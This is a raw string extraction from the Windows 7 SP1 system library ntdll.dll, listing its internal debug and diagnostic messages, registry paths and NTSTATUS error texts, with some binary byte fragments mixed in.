AVRF: failed to enable handle checking (status %X)
AVRF: Failed to find `VerifierStopMessage()' export in verifier.dll!
AVRF: Failed to find verifier.dll among loaded providers!
VERIFIER STOP %p: pid 0x%X: %s
%p : %s
AVRF: provider %ws passed an invalid descriptor @ %p
AVRF: %ws: failed to load provider `%ws' (status X) from %ws
AVRF: pid 0x%X: found dll descriptor for `%ws' with verified exports
AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.
AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled
rUS.Length <= This->PrivatePreallocatedString->MaximumLength
d:\win7sp1_gdr\minkernel\ntdll\sxsisol.cpp
!(askd.Flags & ACTIVATION_CONTEXT_SECTION_KEYED_DATA_FLAG_FOUND_IN_SYSTEM_DEFAULT)
[%x.%x] SXS: %s - Relative redirection plus env var expansion.
SXS: %s() passed the empty activation context data
SXS: %s() called with invalid cookie tid 0xI64x - should be lx
SXS: %s() called with invalid cookie type 0xI64x
SXS: %s() called with invalid flags 0xlx
SXS: %s() Active frame is not the frame being deactivated %p != %p
SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0xlx.
SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0xlx.
SXS: String hash table entry at %p has invalid key offset (= %ld)
RtlpFindUnicodeStringInSection: Unsupported hash algorithm %lu found in string section.
SXS/RTL: TOC entry array (offset: %ld; count = %lu; entry size = %u) is outside bounds of activation context data (%lu bytes)
SXS/RTL: Extended TOC section TOC %d (offset: %ld, size: %u) is outside activation context data bounds (%lu bytes)
SXS/RTL: Extended TOC entry array (starting at offset %ld; count = %lu; entry size = %u) is outside bounds of activation context data (%lu bytes)
SXS: %s() found assembly information section with user data extending beyond section data
SXS: %s() found assembly information section with user data too small
SXS: %s() found assembly information section with user data overlapping section header
SXS: %s() found assembly information section with search structure overlapping section header
SXS: %s() found assembly information section with element list overlapping section header
SXS: %s() passed string section at %p with too small of a header
SXS: %s() passed string section at %p claims %lu byte header size; that doesn't even include the HeaderSize member!
SXS: %s() found assembly information section with wrong magic value
SXS: %s() passed string section at %p only %lu bytes long; that's not even enough for the 4-byte magic and 4-byte header length!
SXS: %s() received invalid non-zero sub-instance index %lu
SXS: %s() found activation context data at %p with assembly roster that has no root
SXS: %s() received invalid sub-instance index %lu out of %lu Assemblies in the Acitvation Context
SXS: %s() received invalid file index (%d) in Assembly (%d)
SXS: %s() found activation context data at %p with wrong format
SXS: %s() - internal coding error; missing switch statement branch for InfoClass == %lu
SXS: %s() - caller asked to use active activation context but passed %p
SXS: %s() - Caller passed invalid hmodule (%p)
SXS: %s() - Caller asked to use activation context from hmodule but passed NULL
SXS: %s() - Caller passed invalid address, not in any .dll (%p)
SXS: %s() - Caller asked to use activation context from address in .dll but passed NULL
SXS: %s() - caller supplied no buffer to populate and no place to return required byte count
SXS: %s() - caller passed nonzero buffer length but NULL buffer pointer
SXS: %s() - caller asked for unknown information class %lu
SXS: %s() - Caller passed meaningless flags/class combination (0xlx/0xlx)
SXS: %s() - Caller passed invalid flags (0xlx)
SXS: Unabel to query location from storage root subkey %wZ; Status = 0xlx
SXS: Unable to open storage root subkey %wZ; Status = 0xlx
SXS: Unable to open registry key %wZ Status = 0xlx
SXS: Attempt to get storage location from subkey %wZ failed; Status = 0xlx
SXS: Unable to enumerate assembly storage subkey #%lu Status = 0xlx
SXS: %s() bad parameters:
SXS: %s() bad parameters
SXS: StorageLocation->Length: 0x%x
SXS: Unable to open assembly directory under storage root "%S"; Status = 0xlx
SXS: Attempt to translate DOS path name "%S" to NT format failed
SXS: Assembly storage resolution failing probe because attempt to allocate %u bytes failed.
SXS: %s() passed the empty activation context
SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx
'LDR: %s(), invalid image format of MUI file
RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %x)
*** Assertion failed: %s%s
*** Source File: %s, line %ld
RtlQueryRegistryValues: Miscomputed buffer size at line %d
VirtualProtect Failed 0xx %x
VirtualQuery Failed 0xx %x
, passed to %s
Invalid heap signature for heap at %x
Unable to release memory at %p for %p bytes - Status == %x
Entry User Heap Size Req.Size Flags
:%u.%u.%u.%u
::ffff:0:%u.%u.%u.%u
::%hs%u.%u.%u.%u
%u.%u.%u.%u
X-X-X-X-X-X
Leaked Block 0x%p size 0x%p (stack %p depth %u)
*** Restarting wait on critsec or resource at %p (in %ws:%s)
*** enter .cxr %p for the context
*** enter .exr %p for the exception record
The instruction at %p tried to %s
*** An Access Violation occurred in %ws:%s
This means that the I/O device reported an I/O error. Check your hardware.
This failed because of error %x.
*** Inpage error in %ws:%s
The critical section is owned by thread %x.
*** Critical Section Timeout (%p) in %ws:%s
The resource is owned shared by %d threads
The resource is owned exclusively by thread %x
*** Resource timeout (%p) in %ws:%s
The stack trace should show the guilty function (the function directly above __report_gsfailure).
*** A stack buffer overrun occurred in %ws:%s
*** Unhandled exception 0xlx, hit in %ws:%s
Trace database: failing attempt to save biiiiig trace (size %u)
*** RtlpMuiRegLoadLicInformation failed with status %x
.hotp1
None%s
I64X: VA32 X -> X %s
I64X: PC32 X -> X (target %p) %s
I64X: VA64 6I64X -> 6I64X %s
Validation failure. Source = %p, Target = %p, Size = %x
Validation failed for global range %u of %u
I64X: jmp X (PC X) {
Unsupported template type
Inserting %u hooks into target image
Header too large (%u>%u) for copy/normalize/validate
Error code: %d - %s
heap_failure_cross_heap_operation
This is located in the %s field of the heap header.
Heap Segment at %p contains invalid NumberOfUnCommittedRanges (%x != %x)
Heap Segment at %p contains invalid NumberOfUnCommittedPages (%x != %x)
Heap block at %p has incorrect segment offset (%x)
Heap entry %p has incorrect PreviousSize field (x instead of x)
Invalid CommitSize parameter - %x
Invalid ReserveSize parameter - %x
Invalid address specified to %s( %p, %p )
Tag x (%ws) size incorrect (%x != %x) %p
Pseudo Tag x size incorrect (%x != %x) %p
dedicated (x) free list element %p is marked busy
Invalid allocation size - %x (exceeded %x)
Just allocated block at %p for 0x%x bytes with tag %ws
Just allocated block at %p for %x bytes
Just reallocated block at %p to 0x%x bytes with tag %ws
Just reallocated block at %p to %x bytes
About to rellocate block at %p to 0x%x bytes with tag %ws
About to reallocate block at %p to %x bytes
/$&@7$&@9$&@:$&@
?SsHd
>SsHd
d:\win7sp1_gdr\minkernel\threadpool\ntdll\timer.c
d:\win7sp1_gdr\minkernel\threadpool\ntdll\pool.c
d:\win7sp1_gdr\minkernel\threadpool\ntdll\work.c
SSSSh(
t%f;U
!wu%d
AlpcReturn = %p, AlpcPort = %p, Callback = %p, Context = %p, CallbackEnviron = %p
TppIopExecuteCallback
Pool = %p, MinThreads = %d
Pool = %p, MaxThreads = %d
File = %x, Direct = %p, Pool = %p
AlpcPort = %x, Direct = %p, Pool = %p
TimerQueueQueue = %p, Timer = %p, DueTime = 0x%I64x, Window = %d
Setting KTimer to 0x6I64x (%s)
KTimer already set for due time = 0x6x
TimerQueue = %p, DoAbsoluteQueue = %s
CapturedPeriod = %d
CapturedWindow = %d
Callback = %p, Context = %p, CallbackEnviron = %p, Flags = 0xx
Wait = %p, WaitStatus = 0xx
Executing Wait callback %p(%p, %p, %p, 0xx)
Count = %d
Work = %p, Context = %p, CallbackEnviron = %p, Flags = 0xx, CleanupGroupVFuncs = %p, TaskVFuncs = %p
CleanupGroupMember = %p, CancelledCallbackCount = %d
CleanupGroupMember = %p, CallbackCount = %d
CleanupGroupMember = %p, Context = %p, CallbackEnviron = %p, Flags = 0xx, VFuncs = %p
d:\win7sp1_gdr\minkernel\threadpool\ntdll\worker.c
Tcb = %p, Wait = %p, CapturedHandle = %x
Tcb = %p, Index = %d, Wait = %p, Status = x
CapturedHasDueTime = %s
CapturedHasDueType = %s
CapturedHandle = 0x%x
Waiter wait completed with status x
Waiter is waiting: Tcb->ActiveWaits = %d, TimeoutPtr = %p, Timeout = 6I64x
*** RESCACHE: Segment %u is no longer valid. It may have been unmapped already!!! ***
*** RESCACHE: Segment %u magic field is corrupt!!! ***
ProcessHeapsListIndex
Status: x
Timer = %p, DueTime = 0x6I64x, Period = %d, WindowLength = %d
Invalid parameter passed to C runtime function.
0j.Xj0f
sBj.Xf
s%j.Zf
j%Xf;
Unhandled Exception: .exr %p - .cxr %p - Status 0xx - dt nt!_TP_CALLBACK_INSTANCE %p
Exception: .exr %p - .cxr %p - Status 0xx - dt nt!_TP_CALLBACK_INSTANCE %p
d:\win7sp1_gdr\minkernel\threadpool\ntdll\tp.c
x @ u: %s: %s:
.sb_data
ntdll.pdb
2$2(2,20242^2
2-3
< <<<@<\<`<
>(>0>4><>@>`>|>
1 1@1`1|1
2 2<2@2\2`2|2
5 5$5@5`5
7 7<7@7\7`7|7
8 8<8@8\8`8
; ;$;(;,;8;
283:4(6`6
<*<1<;<{<
8'9.989=9
=3=8=?={=
0 1 171<1
55i5s5|5
6&7-7B7}7
%s\%sd
\\?\UNC
\\?\UNC\
csrsrv.dll
\Registry\Machine\Software\Microsoft\Windows nt\currentversion\appcompatflags\AIT
\Registry\Machine\Software\Policies\Microsoft\Windows\Appcompat\
\Registry\User\.Default
\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion
%ws\%u
MSCOREE.DLL
ApiPort
CSRPORT!
\Sessions\%ld\Windows\SharedSection
PCATESTDEPRECATION.DLL
MSVBVM50.DLL
MSVCP50.DLL
D3DRM.DLL
kernelbase.dll
kernel32.dll
SPPsvc.exe
DebugProcessHeapOnly
ADVAPI32.DLL
\Registry\Machine\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
.Local
"/\[]:|<> =;,?*
Objects=%4u
Objects>%4u
\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\
verifier.dll
\KernelObjects\SystemErrorPortReady
\WindowsErrorReportingServicePort
\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\
\Registry\Machine\Software\Microsoft\SQMClient\Windows\WMR
\Registry\Machine\Software\Microsoft\Windows\Windows Error Reporting\Escalation
%d.%d.%d.%d
WindowsMessageReportingB1
WinShipAssert
\Software\Microsoft\Windows
svchost.exe
\Registry\Machine\Software\Microsoft\SQMClient\Windows\DisabledProcesses\
\Registry\Machine\Software\Microsoft\SQMClient\Windows\CommonDatapoints\
\Registry\Machine\Software\Microsoft\SQMClient\Windows\DisabledSessions\
\Registry\Machine\Software\Microsoft\SQMClient\Windows
\Registry\Machine\Software\Policies\Microsoft\SQMClient\Windows
ASqmManifest_%x
\Registry\Machine\Software\Microsoft\SQMClient\Windows\AdaptiveSqm\Throttling
\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options
\SmApiPort
\SystemRoot\bootstat.dat
X:%u.%u.%u.%u
%%%u!%s!
WindowsExcludedProcs
KERNEL32.DLL
%SystemRoot%
windows seven
windows vista
\\.\CON
{lx-x-x-xx-xxxxxx}
.Local\
\Registry\Machine\Software\Microsoft\Windows\CurrentVersion\SideBySide\AssemblyStorageRoots
%s\%s%d%s
%s%s%d
%s%s%d%s
%s\%sd\%s*%s
Global\%s/%sd%s
%sd-%s%s
%s\%sd%s
%s\%sd\%s
%sd-%s
TimeZoneKeyName
.owner
.init
ResCache.hit
ResCache.dir
%s\%s
%s_%d
ResCache.usg
ResCache.mni
ResCache.ccm
%s\%s\%s
Global\%s%s%s
%s\%s*%s
%s\*\%s
%s\%s*
Global\%s/base%s
%sd-%s%d
%sd-%s%d%s
%s\%sd\%s%d%s
6.1.7601.17725 (win7sp1_gdr.111116-1503)
Windows
Operating System
6.1.7601.17725
The operation that was requested is pending completion.
An open/create operation completed while an oplock break is underway.
{Connect Failure on Primary Transport}
An attempt was made to connect to the remote server %hs on the primary transport, but the connection failed.
The computer WAS able to connect on a secondary transport.
Cached page was locked during operation.
A file system or file system filter driver has successfully completed an FsFilter operation.
An operation is blocked waiting for an oplock.
{Local Session Key}
A user session key was requested for a local RPC connection. The session key returned is a constant value and not unique to this connection.
A serial I/O operation was completed by another write to a serial port.
A serial I/O operation completed because the time-out period expired. (The IOCTL_SERIAL_XOFF_COUNTER had not reached zero.)
{Password Too Complex}
The Windows password is too complex to be converted to a LAN Manager password. The LAN Manager password returned is a NULL string.
The network transport returned partial data to its client. The remaining data will be sent later.
The network transport returned data to its client that was marked as expedited by the remote system.
The network transport returned partial data to its client and this data was marked as expedited by the remote system. The remaining data will be sent later.
The specified registry key is referenced by a predefined handle.
A yield execution was performed and no thread was available to run.
The operating system will currently accept only 16-bit (R2) pc-cards on this controller.
The CPUs in this multiprocessor system are not all the same revision level. To use all processors the operating system restricts itself to the features of the least capable processor in the system. Should problems occur with this system, contact the CPU manufacturer to see if this mix of processors is supported.
Windows has detected that the system firmware (BIOS) was updated [previous firmware date = %2, current firmware date %3].
The receive operation was successful. Check the ALPC completion list for the received message.
The attempt to commit the Transaction completed, but it is possible that some portion of the transaction tree did not commit successfully due to heuristics. Therefore it is possible that some data modified in the transaction may not have committed, resulting in transactional inconsistency. If possible, check the consistency of the associated data.
The %hs display driver has detected and recovered from a failure. Some graphical operations may have failed. The next time you reboot the machine a dialog will be displayed giving you a chance to upload data about this failure to Microsoft.
A single step or trace operation has just been completed.
Handles to objects have been automatically closed as a result of the requested operation.
During the translation of a global identifier (GUID) to a Windows security ID (SID), no administratively-defined GUID prefix was found. A substitute prefix was used, which will not compromise system security. However, this may provide a more restrictive access than intended.
The media has changed and a verify operation is in progress so no reads or writes may be performed to the device, except those used in the verify operation.
No more entries are available from an enumeration operation.
A long jump has been executed.
The Plug and Play query operation was not successful.
A frame consolidation has been executed.
The application is attempting to run executable code from the module %hs. This may be insecure. An alternative, %hs, is available. Should the application use the secure module %hs?
The application is loading executable code from the module %hs. This is secure, but may be incompatible with previous releases of the operating system. An alternative, %hs, is available. Should the application use the secure module %hs?
The create operation stopped after reaching a symbolic link.
The device has indicated that it's door is open. Further operations require it closed and secured.
Windows discovered a corruption in the file "%hs".
BitLocker encryption keys were ignored because the volume was in a transient state.
A virtual machine is running with its memory allocated across multiple NUMA nodes. This does not indicate a problem unless the performance of your virtual machine is unusually slow. If you are experiencing performance problems, you may need to modify the NUMA configuration. For detailed information, see hXXp://go.microsoft.com/fwlink/?LinkId=92362.
The regeneration operation was not able to copy all data from the active plexes due to bad sectors.
One or more disks were not fully migrated to the target pack. They may or may not require reimport after fixing the hardware problems.
Some BCD entries were not imported correctly from the BCD store.
{Operation Failed}
The requested operation was unsuccessful.
The requested operation is not implemented.
The instruction at 0xlx referenced memory at 0xlx. The memory could not be %s.
The instruction at 0x%p referenced memory at 0x%p. The required data was not placed into memory because of an I/O error status of 0x%x.
An invalid parameter was passed to a service or function.
The specified request is not a valid operation for the target device.
The specified I/O request packet (IRP) cannot be disposed of because the I/O operation is not complete.
Not enough virtual memory or paging file quota is available to complete the specified operation.
An attempt was made to execute an illegal instruction.
An attempt was made to execute an invalid lock sequence.
There is a mismatch between the type of object required by the requested operation and the type of object that is specified in the request.
Windows cannot continue from this exception.
An invalid or unaligned stack was encountered during an unwind operation.
An invalid unwind target was encountered during an unwind operation.
Device parity error on I/O operation.
Invalid Object Attributes specified to NtCreatePort or invalid Port Attributes specified to NtConnectPort
Length of message passed to NtRequestPort or NtRequestWaitReplyPort was longer than the maximum message allowed by the port.
Attempt to send a message to a disconnected communication port.
The NtConnectPort request is refused.
The type of port handle is invalid for the operation requested.
Insufficient quota exists to complete the operation
An attempt to set a process's DebugPort or ExceptionPort was made, but a port already exists in the process or an attempt to set a file's CompletionPort made, but a port was already set in the file or an attempt to set an ALPC port's associated completion port was made, but it is already set.
An operation involving EAs failed because the file system does not support EAs.
An EA operation failed because EA set is too large.
An EA operation failed because the name or EA index is invalid.
A non close operation has been requested of a file object with a delete pending.
An attempt was made to set the control attribute on a file. This attribute is not supported in the target file system.
An attempt has been made to operate on an impersonation token by a thread that is not currently impersonating a client.
Indicates the requested operation would disable or delete the last remaining administration account.
When trying to update a password, this return status indicates that the value provided as the current password is not correct.
When trying to update a password, this return status indicates that the value provided for the new password contains values that are not allowed in passwords.
When trying to update a password, this status indicates that some password update rule has been violated. For example, the password may not meet length criteria.
The user account's password has expired.
%hs is either not designed to run on Windows or it contains an error. Try installing the program again using the original installation media or contact your system administrator or the software vendor for support.
An operation failed because the disk was full.
Floating-point denormal operand.
Floating-point invalid operation.
An attempt was made to install more paging files than the system supports.
An attempt was made to execute an instruction at an unaligned address and the host system does not support unaligned instruction references.
The maximum named pipe instance count has been reached.
An instance of a named pipe cannot be found in the listening state.
The named pipe is not in the connected or closing state.
The specified pipe is set to complete operations and there are current I/O operations queued so it cannot be changed to queue operations.
The specified handle is not open to the server end of the named pipe.
The specified named pipe is in the disconnected state.
The specified named pipe is in the closing state.
The specified named pipe is in the connected state.
The specified named pipe is in the listening state.
The specified named pipe is not in message mode.
The specified I/O operation on %hs was not completed before the time-out period expired.
The passed ACL did not contain the minimum required information.
The request is not supported.
Indicates an attempt was made to operate on the security of an object that does not have security associated with it.
Used to indicate that an operation cannot continue without blocking for I/O.
Used to indicate that a read operation was done on an empty pipe.
Indicates the Sam Server was in the wrong state to perform the desired operation.
Indicates the Domain was in the wrong state to perform the desired operation.
This operation is only allowed for the Primary Domain Controller of the domain.
This error indicates that the requested operation cannot be completed due to a catastrophic media failure or on-disk data structure corruption.
An invalid parameter was passed to a service or function as the first argument.
An invalid parameter was passed to a service or function as the second argument.
An invalid parameter was passed to a service or function as the third argument.
An invalid parameter was passed to a service or function as the fourth argument.
An invalid parameter was passed to a service or function as the fifth argument.
An invalid parameter was passed to a service or function as the sixth argument.
An invalid parameter was passed to a service or function as the seventh argument.
An invalid parameter was passed to a service or function as the eighth argument.
An invalid parameter was passed to a service or function as the ninth argument.
An invalid parameter was passed to a service or function as the tenth argument.
An invalid parameter was passed to a service or function as the eleventh argument.
An invalid parameter was passed to a service or function as the twelfth argument.
A malformed function table was encountered during an unwind operation.
The logon session is not in a state that is consistent with the requested operation.
Indicates that an attempt has been made to impersonate via a named pipe that has not yet been read from.
Indicates that the transaction state of a registry sub-tree is incompatible with the requested operation. For example, a request has been made to start a new transaction with one already in progress, or a request has been made to apply a transaction when one is not currently in progress.
This error should only be returned by the Windows redirector on a remote drive.
Indicates an operation has been attempted on a built-in (special) SAM account which is incompatible with built-in accounts. For example, built-in accounts cannot be deleted.
The operation requested may not be performed on the specified group because it is a built-in special group.
The operation requested may not be performed on the specified user because it is a built-in special user.
An I/O request other than close and several other special case operations was attempted using a file object that had already been closed.
An attempt was made to operate on a thread within a specific process, but the thread specified is not in the process specified.
Your system is low on virtual memory. To ensure that Windows runs properly, increase the size of your virtual memory paging file. For more information, see Help.
The specified image file did not have the correct format, it appears to be a 16-bit Windows image.
The SAM database on a Windows Server is significantly out of synchronization with the copy on the Domain Controller. A complete synchronization is required.
The NtCreateFile API failed. This error should never be returned to an application, it is a place holder for the Windows Lan Manager Redirector to use in its internal error mapping routines.
The network transport on your computer has closed a network connection. There may or may not be I/O requests outstanding.
The network transport on a remote computer has closed a network connection. There may or may not be I/O requests outstanding.
The network transport on your computer has closed a network connection because it had to wait too long for a response from the remote computer.
The connection handle given to the transport was invalid.
The address handle given to the transport was invalid.
The exception %s (0xlx) occurred in the application at location 0xlx.
An invalid level was passed into the specified system call.
{Incorrect Password to LAN Manager Server}
You specified an incorrect password to a LAN Manager 2.x or MS-NET server.
The pipe operation has failed because the other end of the pipe has been closed.
An I/O operation initiated by the Registry failed unrecoverably. The Registry could not read in, or write out, or flush, one of the files that contain the system's image of the Registry.
An event pair synchronization operation was performed using the thread specific client/server event pair object, but no event pair object was associated with the thread.
The maximum number of secrets that may be stored in a single system has been exceeded. The length and number of secrets is limited to satisfy United States State Department export restrictions.
The length of a secret exceeds the maximum length allowed. The length and number of secrets is limited to satisfy United States State Department export restrictions.
The requested operation cannot be performed in fullscreen mode.
An attempt was made to change a user password in the security account manager without providing the necessary Windows cross-encrypted password.
A Windows Server has an incorrect configuration.
The floppy disk controller reported an error that is not recognized by the floppy disk driver.
While accessing the hard disk, a recalibrate operation failed, even after retries.
While accessing the hard disk, a disk operation failed even after retries.
Two concurrent opens of devices that share an IRQ and only work via interrupts is not supported for the particular bus type that the devices use.
Illegal operation attempted on a registry key which has been marked for deletion.
An attempt was made to change a user password in the security account manager without providing the necessary LM cross-encrypted password.
An attempt was made to create a symbolic link in a registry key that already has subkeys or values.
An attempt was made to create a Stable subkey under a Volatile parent key.
The I/O device reported an I/O error.
Log file space is insufficient to support this operation.
A write operation was attempted to a volume after it was dismounted.
The SAM database on the Windows Server does not have a computer account for this workstation trust relationship.
A requested file lock operation cannot be processed due to an invalid byte range.
The subsystem needed to support the image type is not present.
There is no user session key for the specified logon session.
The size of the buffer is invalid for the specified operation.
The transport rejected the network address specified as invalid.
The transport rejected the network address specified due to an invalid use of a wildcard.
The transport address could not be opened because all the available addresses are in use.
The transport address could not be opened because it already exists.
The transport address is now closed.
The transport connection is now disconnected.
The transport connection has been reset.
The transport cannot dynamically acquire any more nodes.
The transport aborted a pending transaction.
The transport timed out a request waiting for a response.
The transport did not receive a release for a pending response.
The transport did not find a transaction matching the specific token.
The transport had previously responded to a transaction request.
The transport does not recognized the transaction request identifier specified.
The transport does not recognize the transaction request type specified.
The transport can only process the specified request on the server side of a session.
The transport can only process the specified request on the client side of a session.
The %hs system process terminated unexpectedly with a status of 0xx (0xx 0xx).
Windows was unable to save all the data for the file %hs. The data has been lost. This error may be caused by a failure of your computer hardware or network connection. Please try to save this file elsewhere.
The parameter(s) passed to the server in the client/server shared memory window were invalid. Too much data may have been put in the shared memory window.
The user's password must be changed before logging on the first time.
Internal OFS status codes indicating how an allocation operation is handled. Either it is retried after the containing onode is moved or the extent stream is converted to a large stream.
The attempt to find the object found an object matching by ID on the volume but it is out of the scope of the handle used for the operation.
The user account has been automatically locked because too many invalid logon attempts or password change attempts have been requested.
The transport connection attempt was refused by the remote system.
The transport connection was gracefully closed.
The transport endpoint already has an address associated with it.
An address has not yet been associated with the transport endpoint.
An operation was attempted on a nonexistent transport connection.
An invalid operation was attempted on an active transport connection.
The remote network is not reachable by the transport.
The remote system is not reachable by the transport.
The remote system does not support the transport protocol.
No service is operating at the destination port of the transport on the remote system.
The transport connection was aborted by the local system.
The requested operation cannot be performed on a file with a user mapped section open.
Attempting to login during an unauthorized time of day for this account.
The account is not authorized to login from this station.
The dynamic link library %hs is not written correctly. The stack pointer has been left in an inconsistent state. The entrypoint should be declared as WINAPI or STDCALL. Select YES to fail the DLL load. Select NO to continue execution. Selecting NO may cause the application to operate incorrectly.
The %hs service is not written correctly. The stack pointer has been left in an inconsistent state. The callback entrypoint should be declared as WINAPI or STDCALL. Selecting OK will cause the service to continue operation. However, the service process may operate incorrectly.
The contacted server does not support the indicated part of the DFS namespace.
A callback return system service cannot be executed when no callback is active.
The password provided is too short to meet the policy of your user account. Please choose a longer password.
The policy of your user account does not allow you to change passwords too frequently. This is done to prevent users from changing back to a familiar, but potentially discovered, password. If you feel your password has been compromised then please contact your administrator immediately to have a new one assigned.
You have attempted to change your password to one that you have used in the past. The policy of your user account does not allow this. Please select a password that you have not previously used.
The specified compression format is unsupported.
An attempt was made to create more links on a file than the file system supports.
{Windows Evaluation Notification}
The evaluation period for this installation of Windows has expired. This system will shutdown in 1 hour. To restore access to this installation of Windows, please upgrade this installation using a licensed distribution of this product.
The system DLL %hs was relocated in memory. The application will not run properly. The relocation occurred because the DLL %hs occupied an address range reserved for Windows system DLLs. The vendor supplying the DLL should be contacted for a new DLL.
Error Status was 0x%x
An operation was attempted to a volume after it was dismounted.
There was no match for the specified key in the index.
The Windows I/O reparse tag passed for the NTFS reparse point is invalid.
The Windows I/O reparse tag does not match the one present in the NTFS reparse point.
The user data passed for the NTFS reparse point is invalid.
There are no EFS keys defined for the user.
The specified file is not in the defined EFS export format.
The guid passed was not recognized as valid by a WMI data provider.
The instance name passed was not recognized as valid by a WMI data provider.
The data item id passed was not recognized as valid by a WMI data provider.
The remote storage service is not operational at this time.
The requested operation could not be performed because the directory service is not the master for that type of operation.
The requested operation did not satisfy one or more constraints associated with the class of the object.
The directory service can perform the requested operation only on a leaf object.
The directory service cannot perform the requested operation on the Relatively Defined Name (RDN) attribute of an object.
An error occurred while performing a cross domain move operation.
The requested operation requires a directory service, and none was available.
The requested interface is not supported.
The driver %hs does not support standby mode. Updating this driver may allow the system to go to standby mode.
Mutual Authentication failed. The server's password is out of date at the domain controller.
Your system is low on virtual memory. Windows is increasing the size of your virtual memory paging file. During this process, memory requests for some applications may be denied. For more information, see Help.
The medium changer's transport element contains media, which is causing the operation to fail.
Error Status: 0x%x.
This operation is supported only when you are connected to the server.
The system image %s is not properly signed. The file has been replaced with the signed file. The system has been shut down.
Current device power state cannot support this request.
The WMI operation is not supported by the data block or method.
There is not enough power to complete the requested operation.
Security Account Manager needs to get the boot password.
Security Account Manager needs to get the boot key from floppy disk.
The requested operation can be performed only on a global catalog server.
Your computer could not be joined to the domain. You have exceeded the maximum number of computer accounts you are allowed to create in this domain. Contact your system administrator to have this limit reset or increased.
This operation cannot be performed on the current domain.
The other end of the security negotiation is requires strong crypto but it is not supported on the local machine.
The client certificate does not contain a valid UPN, or does not match the client name in the logon request. Please contact your administrator.
The encryption type requested is not supported by the KDC.
This operation is not supported on a computer running Windows Server 2003 for Small Business Server
The Master File Table on the volume is too fragmented to complete this operation.
Copy protection error - The given sector does not contain a valid key.
Copy protection error - DVD session key not established.
The Kerberos protocol encountered an error while validating the KDC certificate during smartcard Logon. There is more information in the system event log.
The transport determined that the remote system is down.
An unsupported preauthentication mechanism was presented to the Kerberos package.
The encryption algorithm used on the source file needs a bigger key buffer than the one used on the destination file.
An attempt to remove a process's DebugPort was made, but a port was not already associated with the process.
Debugger Inactive: Windows may have been started without kernel debugging enabled.
This version of Windows is not compatible with the behavior version of directory forest, domain or domain controller.
The specified image file did not have the correct format, it appears to be a 32-bit Windows image.
The specified image file did not have the correct format, it appears to be a 64-bit Windows image.
The SID filtering operation removed all SIDs.
The create operation failed because the name contained at least one mount point which resolves to a volume to which the specified device object is not attached.
A dynamic link library (DLL) referenced a module that was neither a DLL nor the process's executable image.
The requested key container does not exist on the smart card
The requested certificate does not exist on the smart card
The requested keyset does not exist
The smartcard certificate used for authentication has been revoked. Please contact your system administrator. There may be additional information in the event log.
An untrusted certificate authority was detected While processing the smartcard certificate used for authentication. Please contact your system administrator.
The revocation status of the smartcard certificate used for authentication could not be determined. Please contact your system administrator.
The smartcard certificate used for authentication was not trusted. Please contact your system administrator.
The smartcard certificate used for authentication has expired. Please
The Kerberos subsystem encountered an error. A service for user protocol request was made against a domain controller which does not support service for user.
An attempt was made by this server to make a Kerberos constrained delegation request for a target outside of the server's realm. This is not supported, and indicates a misconfiguration on this server's allowed to delegate to list. Please contact your administrator.
The revocation status of the domain controller certificate used for smartcard authentication could not be determined. There is additional information in the system event log. Please contact your system administrator.
An untrusted certificate authority was detected while processing the domain controller certificate used for authentication. There is additional information in the system event log. Please contact your system administrator.
The domain controller certificate used for smartcard logon has expired. Please contact your system administrator with the contents of your system event log.
The domain controller certificate used for smartcard logon has been revoked. Please contact your system administrator with the contents of your system event log.
Data present in one of the parameters is more than the function can operate on.
An attempt to delay-load a .dll or get a function address in a delay-loaded .dll failed.
%hs is a 16-bit application. You do not have permissions to execute 16-bit applications. Check your permissions with your system administrator.
The %hs display driver has stopped working normally. Save your work and reboot the system to restore full display functionality. The next time you reboot the machine a dialog will be displayed giving you a chance to report this failure to Microsoft.
An invalid parameter was passed to a C runtime function.
Illegal operation attempted on a registry key which has already been unloaded.
The requested operation could not be completed due to a file system limitation
Windows cannot verify the digital signature for this file. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.
The requested operation is out of order with respect to other operations.
An operation attempted to exceed an implementation-defined limit.
The requested operation requires elevation.
The PKU2U protocol encountered an error while attempting to utilize the associated certificates.
The operation was attempted beyond the valid data length of the file.
The attempted write operation encountered a write already in progress for some portion of the range.
The page fault mappings changed in the middle of processing a fault so the operation must be retried.
Client Side Encryption is not supported by the remote server even though it claims to support it.
The specified thread is already joining a task.
A callback has requested to bypass native code.
Windows cannot verify the digital signature for this file. The signing certificate for this file has been revoked.
The ALPC port is closed.
The connection port is used in an invalid context.
The ALPC port does not accept new request messages.
The hardware has reported an uncorrectable memory error.
Status 0xx was returned, waiting on handle 0x%x for wait 0x%p, in waiter 0x%p.
After a callback to 0x%p(0x%p), a completion call to SetEvent(0x%p) failed with status 0xx.
After a callback to 0x%p(0x%p), a completion call to ReleaseSemaphore(0x%p, %d) failed with status 0xx.
After a callback to 0x%p(0x%p), a completion call to ReleaseMutex(%p) failed with status 0xx.
After a callback to 0x%p(0x%p), an completion call to FreeLibrary(%p) failed with status 0xx.
A threadpool worker thread is impersonating a client, after executing an APC.
The client certificate account mapping is not unique.
The specified port already has a completion list.
A threadpool worker thread enter a callback at thread base priority 0x%x and exited at priority 0x%x.
An invalid thread, handle %p, is specified for this operation. Possibly, a threadpool worker thread was specified.
The attempted operation required self healing to be enabled.
The Directory Service cannot perform the requested operation because a domain rename operation is in progress.
The requested file operation failed because the storage quota was exceeded.
The requested file operation failed because the storage policy blocks that type of file. For more information, contact your system administrator.
The operation could not be completed due to bad clusters on disk.
The operation could not be completed because the volume is dirty. Please run chkdsk and try again.
Access Denied. Before opening files in this location, you must first browse to the web site and select the option to login automatically.
Operation did not complete successfully because the file contains a virus.
The operation did not complete successfully because it would cause an oplock to be broken. The caller has requested that existing oplocks not be broken.
The cryptographic provider does not support HMAC.
An operation or data has been rejected while on the network fast path.
